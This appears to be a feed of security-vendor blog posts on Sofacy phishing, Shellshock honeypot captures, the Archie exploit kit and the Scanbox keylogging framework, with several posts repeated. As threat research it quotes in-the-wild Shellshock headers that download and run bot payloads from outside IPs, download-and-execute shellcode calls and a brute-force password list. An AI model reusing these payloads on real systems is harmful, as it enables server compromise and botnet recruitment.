Activity Not Available

News

  Analyzed about 1 month ago based on code collected 3 months ago.
 
Posted 6 months ago
Yesterday, another cyber espionage group with Russian roots made it to the New York Times headlines again courtesy of FireEye and a new report they published.

FireEye did a pretty good job on attribution and giving some technical indicators; ... [More] however, they neglected to reference previous work on this threat actor from companies like PWC, TrendMicro, ESET and others.

We have been tracking this threat actor (Sofacy) for a few years when it first appeared on our radar in one of the CVE-2012-0158/CVE-2010-3333 clusters. Based on the lure content contained in the malicious documents as well as the phishing campaigns we have seen in the past, this group tends to target NATO, Eastern Europe government and military institutions and defense contractors. We have seen lures related to Ukraine, Chechnya and Georgia that indicates one of the group's objectives is gathering geopolitical intelligence.

The techniques used by this group have evolved over the years.

- Spearphishing

Most of the Spearphishing campaigns launched by this group involve a malicious Word document exploiting one of the following vulnerabilities:

CVE-2010-3333 CVE-2012-0158 CVE-2014-1761As described by FireEye and others, this group uses different payloads including a downloader and several second-stage backdoors and implants.

We cover these tools using the following rules with USM:

System Compromise, Targeted Malware, OLDBAIT - Sofacy System Compromise, Targeted Malware, Chopstick - Sofacy System Compromise, Targeted Malware, Coreshell - Sofacy System Compromise, C&C Communication, Sofacy Activity- Web compromises

The group has been seen infecting websites and redirecting visitors to a custom exploit kit being able to take advantage of the following vulnerabilities affecting Internet Explorer:

CVE-2013-1347 CVE-2013-3897 CVE-2014-1776The following rule detects activity related to this exploit kit:

Exploitation & Installation, Malicious website - Exploit Kit, Sednit EK- Phishing campaigns

This actor uses phishing campaigns to redirect victims to Outlook Web Access (OWA) portals designed to impersonate the legitimate OWA site of the victim's company. This technique is used to compromise credentials and access mailboxes and other services within the company.

Inspecting the content of the malicious redirect we can alert on this activity using the following rule:

Delivery & Attack, Malicious website, Sofacy PhishingReferences:

[1] http://pwc.blogs.com/files/tactical-intelligence-bulletin---sofacy-phishing-.pdf
[2] http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-the-red-in-sednit/
[3] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf
[4] http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/
[5] http://malware.prevenity.com/2014/08/malware-info.html
[6] http://www.fireeye.com/resources/pdfs/apt28.pdf

        [Less]
Posted 7 months ago
Yesterday, a new vulnerability affecting Bash (CVE-2014-6271) was published. The new vulnerability allows attackers to execute arbitrary commands formatting an environmental variable using a specific format. It affects Bash (the Bourne Again SHell) ... [More] , the default command shell for Linux and other UNIX flavors inlcuding Mac OS X. The vulnerability is critical since it can be exposed on web servers that use mod_cgi or code that calls the bash shell. Other systems that are probably affected are network services and daemons that use shell scripts with environmental variables.

Yesterday we began running a new module in our honeypots, waiting for attackers to exploit this vulnerability.

We have had several hits in the last 24 hours. Most of them are systems trying to detect if the system is vulnerable and they simple send a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -

referer, () { :; }; ping -c 11 209.126.230.74

122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200 -

89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200

user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

Apart from those hits we have found two attackers that are using the vulnerability to install two different pieces of malware on the victims.

The first one downloads and executes an ELF binary:

Cookie, ().{.:;.};.wget /tmp/besh http://162.253.66[.]76/nginx; chmod.777 /tmp/besh; /tmp/besh;

MD5 (nginx) = 5924bcc045bb7039f55c6ce29234e29a

nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped

If we take a look at the binary, we can see it tries to get information about the system such as number of CPUs, network configuration, etc.

It also contains the following code:

/bin/busybox;echo -e '\147\141\171\146\147\164'

It is basically used to fingerprint honeypots as described here:

https://isc.sans.edu/diary/Busybox Honeypot Fingerprinting and a new DVR scanner/18055

The sample opens a connection to a C&C server on 89.238.150.154 port 5. It supports the following commands:

PING
GETLOCALIP
SCANNER
HOLD
JUNK (DoS Flood)
UDP (DoS Flood)
TCP (DoS Flood)
KILLATTK
LOLNOGTFO

You can find a list of username/password hardcoded in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

This list is probably used to perform brute force attacks.

There is another sample downloaded from the same server (apache):

MD5 (apache (1)) = 371b8b20d4dd207f7b3f61bb30a7cb22

It contains the same code but a different C&C server, 162.253.66.76 port 53

You can use the following Yara rule to detect the Linux bot:

rule bashWorm {
       strings:
               $a = "JUNK Flooding %s:%d for %d seconds."
               $a2 = "UDP Flooding %s for %d seconds."
               $a3 = "UDP Flooding %s:%d for %d seconds."
               $a4 = "TCP Flooding %s for %d seconds."
               $a5 = "KILLATTK"
               $a6 = "REPORT %s:%s:"
               $a7 = "PING"
               $a8 = "PONG!"
               $a9 = "GETLOCALIP"
       condition:
               all of them
}

Perl bot

Apart from that piece of malware, our honeypot received another interesting attack a few hours ago:

User-Agent, "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\”

The file is a PERL script with MD5 0763b8c00d6862d2d0f8f980de065857.

It seems it is a repurposed IRC bot that connects to an IRC server and waits for commands.

The perl script starts the following process:

root     17720 81.1  0.0  24848  4140 ?        R    17:52   0:04 /usr/sbin/atd

As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443. it joins the following channel on the IRC server:

  JOIN #new ddosit.

3810-  51 |PHP|3551 :There are 1 users and 715 invisible on 1 servers..

It seems there are 715 users (probably victims) connected to the server right now.

As soon as new victims join the server, the attackers are executing the command "uname  -a" to determine the operating system that is running on the victim as well as "id" to check the current username.

Since our honeypot joined the server, more than 20 new victims have become part of the botnet. Some examples are:

 Linux xxx.321webhosting.biz 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux..
 Linux xxx.mydreamads.com 2.6.18-308.1.1.el5xen #1 SMP Wed Mar 7 05:38:01 EST 2012 i686 i686 i386 GNU/Linux..
 Darwin cisco 13.3.0 Darwin Kernel Version 13.3.0: Tue Jun  3 21:27:35 PDT 2014; root:xnu-2422.110.17~1/RELEASE_X86_64 x86_64..
 Linux xxx.servlinux.net 2.6.32-431.20.3.el6.x86_64 #1 SMP Thu Jun 19 21:14:45 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux..
 Linux xxx.hostforleads.com 2.6.32-279.14.1.el6.i686 #1 SMP Tue Nov 6 21:05:14 UTC 2012 i686 i686 i386 GNU/Linux..
 Linux xxx.tekburst.com 3.2.62-74.art.x86_64 #1 SMP Fri Sep 12 09:46:02 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux..
 Linux Mitel5kps 2.6.36 #1 Thu Aug 11 00:23:48 GMT 2011 i686 GNU/Linux..
 Linux Mitel5000 2.6.22.19-4.03.0-mitel_acp5000 #2 Fri Mar 28 05:00:24 MST 2014 armv6l GNU/Linux..
 Darwin Discovery.local 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64..
 PHP 5.4.30 (cli) (built: Jul 29 2014 23:43:29) Zend Engine v2.4.0, Copyright (c) 1998-2014
 Linux antares 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:01 UTC 2014 i686 athlon i686 GNU/Linux..
 Linux cs94.XXX.com 2.6.9-89.0.16.plus.c4smp #1 SMP Tue Nov 3 18:15:39 EST 2009 i686 i686 i386 GNU/Linux..

The attackers appear to be Romanian speakers as we can see in the following messages that we have seen in the IRC server:

  :x!x@localhost PRIVMSG #new :EU MAI STIU FRATE ?
  :JB!JB@localhost PRIVMSG #new :ma duc pana jos..
  :x!x@localhost PRIVMSG #new :ca se inverzeste ecranu..

We will be updating the blog post as we discover more information about these threats.

Thanks to Eduardo de la Arada from the labs team for assisting on the analysis of the Linux bot.

        [Less]
Posted 7 months ago
Yesterday, a new vulnerability affecting Bash (CVE-2014-6271) was published. The new vulnerability allows attackers to execute arbitrary commands formatting an environmental variable using a specific format. It affects Bash (the Bourne Again SHell) ... [More] , the default command shell for Linux and other UNIX flavors inlcuding Mac OS X. The vulnerability is critical since it can be exposed on web servers that use mod_cgi or code that calls the bash shell. Other systems that are probably affected are network services and daemons that use shell scripts with environmental variables.

Yesterday we began running a new module in our honeypots, waiting for attackers to exploit this vulnerability.

We have had several hits in the last 24 hours. Most of them are systems trying to detect if the system is vulnerable and they simple send a ping command back to the attacker’s machine:

209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -

referer, () { :; }; ping -c 11 209.126.230.74

122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200 -

89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200

user-agent, () { :;}; /bin/ping -c 1 198.101.206.138

Apart from those hits we have found two attackers that are using the vulnerability to install two different pieces of malware on the victims.

The first one downloads and executes an ELF binary:

Cookie, ().{.:;.};.wget /tmp/besh http://162.253.66[.]76/nginx; chmod.777 /tmp/besh; /tmp/besh;

MD5 (nginx) = 5924bcc045bb7039f55c6ce29234e29a

nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped

If we take a look at the binary, we can see it tries to get information about the system such as number of CPUs, network configuration, etc.

It also contains the following code:

/bin/busybox;echo -e '\147\141\171\146\147\164'

It is basically used to fingerprint honeypots as described here:

https://isc.sans.edu/diary/Busybox Honeypot Fingerprinting and a new DVR scanner/18055

The sample opens a connection to a C&C server on 89.238.150.154 port 5. It supports the following commands:

PING
GETLOCALIP
SCANNER
HOLD
JUNK (DoS Flood)
UDP (DoS Flood)
TCP (DoS Flood)
KILLATTK
LOLNOGTFO

You can find a list of username/password hardcoded in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

This list is probably used to perform brute force attacks.

There is another sample downloaded from the same server (apache):

MD5 (apache (1)) = 371b8b20d4dd207f7b3f61bb30a7cb22

It contains the same code but a different C&C server, 162.253.66.76 port 53

You can use the following Yara rule to detect the Linux bot:

rule bashWorm {
       strings:
               $a = "JUNK Flooding %s:%d for %d seconds."
               $a2 = "UDP Flooding %s for %d seconds."
               $a3 = "UDP Flooding %s:%d for %d seconds."
               $a4 = "TCP Flooding %s for %d seconds."
               $a5 = "KILLATTK"
               $a6 = "REPORT %s:%s:"
               $a7 = "PING"
               $a8 = "PONG!"
               $a9 = "GETLOCALIP"
       condition:
               all of them
}

Perl bot

Apart from that piece of malware, our honeypot received another interesting attack a few hours ago:

User-Agent, "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\”

The file is a PERL script with MD5 0763b8c00d6862d2d0f8f980de065857.

It seems it is a repurposed IRC bot that connects to an IRC server and waits for commands.

The perl script starts the following process:

root     17720 81.1  0.0  24848  4140 ?        R    17:52   0:04 /usr/sbin/atd

As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443. it joins the following channel on the IRC server:

  JOIN #new ddosit.

3810-  51 |PHP|3551 :There are 1 users and 715 invisible on 1 servers..

It seems there are 715 users (probably victims) connected to the server right now.

As soon as new victims join the server, the attackers are executing the command "uname  -a" to determine the operating system that is running on the victim as well as "id" to check the current username.

Since our honeypot joined the server, more than 20 new victims have become part of the botnet. Some examples are:

 Linux xxx.321webhosting.biz 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux..
 Linux xxx.mydreamads.com 2.6.18-308.1.1.el5xen #1 SMP Wed Mar 7 05:38:01 EST 2012 i686 i686 i386 GNU/Linux..
 Darwin cisco 13.3.0 Darwin Kernel Version 13.3.0: Tue Jun  3 21:27:35 PDT 2014; root:xnu-2422.110.17~1/RELEASE_X86_64 x86_64..
 Linux xxx.servlinux.net 2.6.32-431.20.3.el6.x86_64 #1 SMP Thu Jun 19 21:14:45 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux..
 Linux xxx.hostforleads.com 2.6.32-279.14.1.el6.i686 #1 SMP Tue Nov 6 21:05:14 UTC 2012 i686 i686 i386 GNU/Linux..
 Linux xxx.tekburst.com 3.2.62-74.art.x86_64 #1 SMP Fri Sep 12 09:46:02 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux..
 Linux Mitel5kps 2.6.36 #1 Thu Aug 11 00:23:48 GMT 2011 i686 GNU/Linux..
 Linux Mitel5000 2.6.22.19-4.03.0-mitel_acp5000 #2 Fri Mar 28 05:00:24 MST 2014 armv6l GNU/Linux..
 Darwin Discovery.local 13.4.0 Darwin Kernel Version 13.4.0: Sun Aug 17 19:50:11 PDT 2014; root:xnu-2422.115.4~1/RELEASE_X86_64 x86_64..
 PHP 5.4.30 (cli) (built: Jul 29 2014 23:43:29) Zend Engine v2.4.0, Copyright (c) 1998-2014
 Linux antares 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:01 UTC 2014 i686 athlon i686 GNU/Linux..
 Linux cs94.XXX.com 2.6.9-89.0.16.plus.c4smp #1 SMP Tue Nov 3 18:15:39 EST 2009 i686 i686 i386 GNU/Linux..

The attackers appear to be Romanian speakers as we can see in the following messages that we have seen in the IRC server:

  :x!x@localhost PRIVMSG #new :EU MAI STIU FRATE ?
  :JB!JB@localhost PRIVMSG #new :ma duc pana jos..
  :x!x@localhost PRIVMSG #new :ca se inverzeste ecranu..

We will be updating the blog post as we discover more information about these threats.

Thanks to Eduardo de la Arada from the labs team for assisting on the analysis of the Linux bot.

        [Less]
Posted 8 months ago
We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems.

The number of Exploit Kits available has experienced exponential growth in the last ... [More] few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf at EmergingThreats.

Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework. When the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information about Flash, Silverlight and Acrobat Reader versions and the information is sent to the server.

It also uses the following trick to check whether or not the system is running a 64-bit version of Internet Explorer. We documented this trick in previous blog posts.

Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including:

Filename CVE Affected Software MD5 flashlow.swf CVE-2014-0497 Flash 4f3f7b896ab69ec2c082709220000b38 flashhigh.swf CVE-2014-0515 Flash 18e0629ba830f0894268aa1dca92ea78 silverapp1.xap CVE-2013-0074 SilverLight f1759371fe6c7f46ca3c82edd456eca2 iebasic.html CVE-2013-2551 Internet Explorer e9fbd007f6fa2f188c090f535da7ca4a Archie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them.

If we disassemble the shellcode we can see it is a basic download and execute payload.

4010bb     LoadLibraryA(urlmon)
401089     VirtualAlloc(base=0 , sz=400) = 60000
4010ce     GetTempPath(len=104, buf=60000) = 14
4010a7     URLDownloadToFile(http://IPADDRESS:PORT/dd, C:\users\user\Temp\e.dll)
401108     LoadLibraryA(C:\users\user\Temp\e.dll)
401114     Sleep(0x3a98)

The shellcode downloads a DLL from the webserver, writes it in \Users\[Current_user]\Temp\e.dll and then loads it.

The IP address where the Archie Exploit Kit is hosted, and the piece of malware delivered, is also being used for click fraud operations. It is related to this research published by Kimberly on the click fraud bot.

Following is the list of hashes that we have found connecting to the same C&C:

17b077840ab874a8370c98c840b6c671
7bd2207dcef1878109e88a4527162d09
89c136eae9163d63918e0ef59bd6ac82
d1b11795c3e3736de834abc39f7bd76a
1d648b48d1e2b0f2855e2659f32c94ad
48feab46efc26519820e5b8a9152e529
e54d5fef5e3c050f529e814dca4d8014
83f5aef0de9da8cb813c5c8ffbaf1ead
b47739296783ac7fced9ccb49c833ae8
09102b0fe2be8b85136d454b14ec7398
dbcb2d297e5d79c5a161801b2be775ba
30b729137b5ee8805e3e9cc1dbb75609
a615334472c30ee680f798e3849def66
8268f911c87a33f29c00af1dd2c1c2a6
389c5931703a031faebf5f5406f86752
2da11eb62f514abc2ea68271655cb791

        [Less]
Posted 8 months ago
We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems.

The number of Exploit Kits available has experienced exponential growth in the last ... [More] few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf at EmergingThreats.

Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework. When the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information about Flash, Silverlight and Acrobat Reader versions and the information is sent to the server.

It also uses the following trick to check whether or not the system is running a 64-bit version of Internet Explorer. We documented this trick in previous blog posts.

Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including:

Filename CVE Affected Software MD5 flashlow.swf CVE-2014-0497 Flash 4f3f7b896ab69ec2c082709220000b38 flashhigh.swf CVE-2014-0515 Flash 18e0629ba830f0894268aa1dca92ea78 silverapp1.xap CVE-2013-0074 SilverLight f1759371fe6c7f46ca3c82edd456eca2 iebasic.html CVE-2013-2551 Internet Explorer e9fbd007f6fa2f188c090f535da7ca4a Archie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them.

If we disassemble the shellcode we can see it is a basic download and execute payload.

4010bb     LoadLibraryA(urlmon)
401089     VirtualAlloc(base=0 , sz=400) = 60000
4010ce     GetTempPath(len=104, buf=60000) = 14
4010a7     URLDownloadToFile(http://IPADDRESS:PORT/dd, C:\users\user\Temp\e.dll)
401108     LoadLibraryA(C:\users\user\Temp\e.dll)
401114     Sleep(0x3a98)

The shellcode downloads a DLL from the webserver, writes it in \Users\[Current_user]\Temp\e.dll and then loads it.

The IP address where the Archie Exploit Kit is hosted, and the piece of malware delivered, is also being used for click fraud operations. It is related to this research published by Kimberly on the click fraud bot.

Following is the list of hashes that we have found connecting to the same C&C:

17b077840ab874a8370c98c840b6c671
7bd2207dcef1878109e88a4527162d09
89c136eae9163d63918e0ef59bd6ac82
d1b11795c3e3736de834abc39f7bd76a
1d648b48d1e2b0f2855e2659f32c94ad
48feab46efc26519820e5b8a9152e529
e54d5fef5e3c050f529e814dca4d8014
83f5aef0de9da8cb813c5c8ffbaf1ead
b47739296783ac7fced9ccb49c833ae8
09102b0fe2be8b85136d454b14ec7398
dbcb2d297e5d79c5a161801b2be775ba
30b729137b5ee8805e3e9cc1dbb75609
a615334472c30ee680f798e3849def66
8268f911c87a33f29c00af1dd2c1c2a6
389c5931703a031faebf5f5406f86752
2da11eb62f514abc2ea68271655cb791

        [Less]
Posted 8 months ago
A few days ago we detected a watering hole campaign in a website owned by one big industrial company.

The website is related to software used for simulation and system engineering in a wide range of industries, including ... [More] automotive, aerospace, and manufacturing.

The attackers were able to compromise the website and include code that loaded a malicious Javascript file from a remote server. This Javascript file is a framework for reconnaissance that the attackers call "Scanbox" and includes some of the techniques we described in a previous blog post: Attackers abusing Internet Explorer to enumerate software and detect security products  

The Scanbox framework first configures the remote C&C server that it will use and collects a small amount of information about the victim that is visiting the compromised website including:

Referer User-Agent Location Cookie Title (To identify specific content that the victim is visiting) Domain Charset Screen width and height Operating System Language Resulting in something like this:

Before sending the information to the C&C server, Scanbox encodes and encrypts the data with the following function:

Producing the following request:

If we decrypt the data it translates to:

After the first request, the framework contains several plugins to extract different information from the victim.

Pluginid 1: Enumerates software installed in the system using the technique we explained before that affects Internet Explorer. It also checks if the system is running different versions of EMET (Enhanced Mitigation Experience Toolkit):

Producing the list of security software on the target

Pluginid 2: Enumerates Adobe Flash versions

Pluginid 5: Enumerates Microsoft Office versions

Pluginid 6: Enumerates Acrobat Reader versions

Pluginid 8: Enumerates Java versions

Pluginid 21: Implements a “keylogger” functionality trough Javascript that logs all the keystrokes the victim is typing inside the compromised website.

While the user is browsing the compromised website, all keystrokes are being recorded and sent to the C&C periodically. It will also send keystrokes when the user submits web forms that can potentially include passwords and other sensitive data.

As we have seen, this is a very powerful framework that gives attackers a lot of insight into the potential targets that will help them launching future attacks against them.

We have also seen several Metasploit-produced exploits that target different versions of Java in the same IP address that hosts the Scanbox framework (122.10.9[.]109).

We recommend you look for this type of activity against the following machines in your network:

mail[.]webmailgoogle.com js[.]webmailgoogle.com 122[.]10.9.109         [Less]
Posted 8 months ago
A few days ago we detected a watering hole campaign in a website owned by one big industrial company.

The website is related to software used for simulation and system engineering in a wide range of industries, including ... [More] automotive, aerospace, and manufacturing.

The attackers were able to compromise the website and include code that loaded a malicious Javascript file from a remote server. This Javascript file is a framework for reconnaissance that the attackers call "Scanbox" and includes some of the techniques we described in a previous blog post: Attackers abusing Internet Explorer to enumerate software and detect security products  

The Scanbox framework first configures the remote C&C server that it will use and collects a small amount of information about the victim that is visiting the compromised website including:

Referer
User-Agent
Location
Cookie
Title (To identify specific content that the victim is visiting)
Domain
Charset
Screen width and height
Operating System
Language

Resulting in something like this:

Before sending the information to the C&C server, Scanbox encodes and encrypts the data with the following function:

Producing the following request:

If we decrypt the data it translates to:

After the first request, the framework contains several plugins to extract different information from the victim.

Pluginid 1: Enumerates software installed in the system using the technique we explained before that affects Internet Explorer. It also checks if the system is running different versions of EMET (Enhanced Mitigation Experience Toolkit):

Producing the list of security software on the target

Pluginid 2: Enumerates Adobe Flash versions

Pluginid 5: Enumerates Microsoft Office versions

Pluginid 6: Enumerates Acrobat Reader versions

Pluginid 8: Enumerates Java versions

Pluginid 21: Implements a “keylogger” functionality trough Javascript that logs all the keystrokes the victim is typing inside the compromised website.

While the user is browsing the compromised website, all keystrokes are being recorded and sent to the C&C periodically. It will also send keystrokes when the user submits web forms that can potentially include passwords and other sensitive data.

As we have seen, this is a very powerful framework that gives attackers a lot of insight into the potential targets that will help them launching future attacks against them.

We have also seen several Metasploit-produced exploits that target different versions of Java in the same IP address that hosts the Scanbox framework (122.10.9[.]109).

We recommend you look for this type of activity against the following machines in your network:

mail[.]webmailgoogle.com
js[.]webmailgoogle.com
122[.]10.9.109

        [Less]
Posted 10 months ago
During the last few years we have seen an increase on the number of malicious actors using tricks and browser vulnerabilities to enumerate the software that is running on the victim’s system using Internet Explorer.

In this blog post ... [More] we will describe some of the techniques that attackers are using to perform reconnaisance that gives them information for future attacks. We have also seen these techniques being used to decide whether or not they exploit the victim based on detected Antivirus, versions of potential vulnerable software or the presence of certain security features such as Enhanced Mitigation Experience Toolkit EMET. EMET is a Microsoft tool that uses security mitigation to prevent vulnerabilities from being successfully exploited.  This makes it more difficult for attackers – so they would prefer to avoid it.

1. Abusing res:\\

 The first technique we are describing affects Internet Explorer 8 and earlier. Internet Explorer blocks attempts to access the local file system using “file://” but it used to be possible to access image files within a resource section of a DLL/EXE. In a previous blog post we mentioned how attackers were using this technique as part of a waterhole campaign affecting a Thailand NGO. In that case we found the following code in the HTML of the affected website:

The resList array contains a list of executable files with resource sections containing an image file. An example using explorer.exe:

 {id: 'Windows Explorer', res: 'res://explorer.exe/#2/#143'}

If we take a look at the resource sections present on explorer.exe we can find a resource named 143:

 

The resLis array contains a big list of executable files that is used to detect Antivirus software and VMware (probably to check if it is an analysis machine used by a security researcher):

The complete list of detected software is:

 Webroot
 Sophos
 Microsoft Security Client
 F-Secure
 BitDefender
 Norton Antivirus
 McAfee Antivirus
 Kingsoft Antivirus
 Avira Antivirus
 Kaspersky Antivirus
 360 AV
 ESET NOD32
 Trend Micro Internet Security
 Rising Antivirus
Vmware Player
Vmware Tools

We found similar code being used by the Sykipot actors in combination with a phishing scheme. In that case the list of software was much longer and it detected common software along with security products:

The list of detected software:

Microsoft Office (all versions)
WPS (Kingsoft Office)
Winrar
Winzip
7z
Adobre Reader (all versions)
Skype
Microsoft Outlook (all versions)
Yahoo Messenger (all versions)
Flashget
Thunder
Emule
Serv-U
RAdmin
UltraVNC
pcAnywhere
RealVNC
Fetion
Google Talk
AliIM
POPO
ICQLite
ICQ
Tencent Messenger
Sina UC
QQ
BaihI
AIM
Microsoft Messenger
Windows Live MSN
Windows Media Player (all versions)
SSReader
PPStream
Storm Player
TTPlayer
Haojie SuperPlayer
Winamp
KuGoo
UltraEdit
Sylpheed
ACDSee
Photoshop
Foxmail
Gmail Notifier
Windows Live Mail
Adobe Media Player
Flash CS
Dreamwear
Fireworks
Delphi
Java
VMware Tools
Tracks Eraser
Microsoft Virtual PC
VMware
Microsoft ActiveSync
Microsoft .NET
PGP
CCClient
DriverGenius
Daemon Tools
MagicSet
Baidu Tool
Foxit Reader
MySQL Server (all versions)
SQLyog
Firefox
World IE
TT IE
Google Chrome
Maxthon
360 IE
Opera
Safari
SaaYaa
GreenBrowser

Security software detected:

Microsoft Security Essentials
AVG
360
SSM
Keniu
ESET
NOD32
Skynet Firewall
Kingsoft
Norton
Rising AV
Kaspersky
JingMin kav
Mcafee
BitDefender
AntiVir
TrendMicro
Avira
Dr Web
Avast
Sophos
Zone Alarm
Panda Security

They also used this code snippet to detect Adobe Acrobat Reader (English, Chinese and Taiwanese.)

Finally they were also able to list the patches that were installed in the Microsoft platform using a predefined list of patch numbers:

2. Microsoft XMLDOM ActiveX control information disclosure vulnerability

Another technique we found is being used by the Deep Panda actors.  They usually use this code in waterholing campaigns to detect specific software installed on the intended victim's system. It exploits the XMLDOM ActiveX to check for the presence of multiple files and folders:

This vulnerability was disclosed last year and it affects Internet Explorer versions 6 through 11 running on Windows through version 8.1.

Software enumerated includes most of the Antivirus and endpoint security products on the market:

7z
AhnLab_V3
BkavHome
Java
COMODO
Dr.Web
ESET-SMART
ESTsoft
F-PROT
F-Secure
Fortinet
IKARUS
Immunet
JiangMin
Kaspersky_2012
Kaspersky_2013
Kaspersky_Endpoint_Security_8
Mse
Norman
Norton
Nprotect
Outpost
PC_Tools
QuickHeal
Rising
Rising_firewall
SQLServer
SUPERAntiSpyware
Sunbelt
Symantec_Endpoint12
Trend2013
ViRobot4
VirusBuster
WinRAR
a-squared
antiyfx
avg2012
bitdefender_2013
eScan
eset_nod32
f-secure2011
iTunes
mcafee-x64
mcafee_enterprise
north-x64
sophos
symantec-endpoint
systemwaler
systemwaler-cap
trend
trend-x64
var justforfunpath
vmware-client
vmware-server
winzip

3. More XMLDOM vulnerabilities

At the beginning of the year we found a different method being used in combination with a Zeroday vulnerability affecting Internet Explorer (CVE-2014-0322) targeting the French Aerospace Association. In that case we found the following code snippet.

The attackers were using a similar technique to detect if EMET was present on the system.  If EMET was detected they didn’t trigger the exploit since EMET was able to block it and alert the user to the 0 Day and diminish the attacker's effectiveness.

A month after the exploit code was made public we detected the same technique being used in the Angler Exploit Kit. They were using it to detect Kaspersky Antivirus.

In recent samples of the Angler Exploit Kit we have seen an improved version where they added detection for TrendMicro products.

In this blog post we have given an overview of the different techniques attackers are using to enumerate software running on a remote system.  These techniques can give attackers information that they can use in future attacks to exploit certain vectors based on the software running (or not running) on a system. In addition, we've illustrated ways were cybercriminals have adapted and copied techniques used by more advanced attackers for their own purposes.

References:

Vulnerability in Internet Explorer 10.1

XMLDOM vulnerability

URI Use and Abuse

Angler Exploit Kit 

        [Less]
Posted 10 months ago
During the last few years we have seen an increase on the number of malicious actors using tricks and browser vulnerabilities to enumerate the software that is running on the victim’s system using Internet Explorer.

In this blog post ... [More] we will describe some of the techniques that attackers are using to perform reconnaisance that gives them information for future attacks. We have also seen these techniques being used to decide whether or not they exploit the victim based on detected Antivirus, versions of potential vulnerable software or the presence of certain security features such as Enhanced Mitigation Experience Toolkit EMET. EMET is a Microsoft tool that uses security mitigation to prevent vulnerabilities from being successfully exploited.  This makes it more difficult for attackers – so they would prefer to avoid it.

1. Abusing res:\\

 The first technique we are describing affects Internet Explorer 8 and earlier. Internet Explorer blocks attempts to access the local file system using “file://” but it used to be possible to access image files within a resource section of a DLL/EXE. In a previous blog post we mentioned how attackers were using this technique as part of a waterhole campaign affecting a Thailand NGO. In that case we found the following code in the HTML of the affected website:

The resList array contains a list of executable files with resource sections containing an image file. An example using explorer.exe:

 {id: 'Windows Explorer', res: 'res://explorer.exe/#2/#143'}

If we take a look at the resource sections present on explorer.exe we can find a resource named 143:

 

The resLis array contains a big list of executable files that is used to detect Antivirus software and VMware (probably to check if it is an analysis machine used by a security researcher):

The complete list of detected software is:

 Webroot  Sophos  Microsoft Security Client  F-Secure  BitDefender  Norton Antivirus  McAfee Antivirus  Kingsoft Antivirus  Avira Antivirus  Kaspersky Antivirus  360 AV  ESET NOD32  Trend Micro Internet Security  Rising Antivirus Vmware Player Vmware Tools We found similar code being used by the Sykipot actors in combination with a phishing scheme. In that case the list of software was much longer and it detected common software along with security products:

The list of detected software:

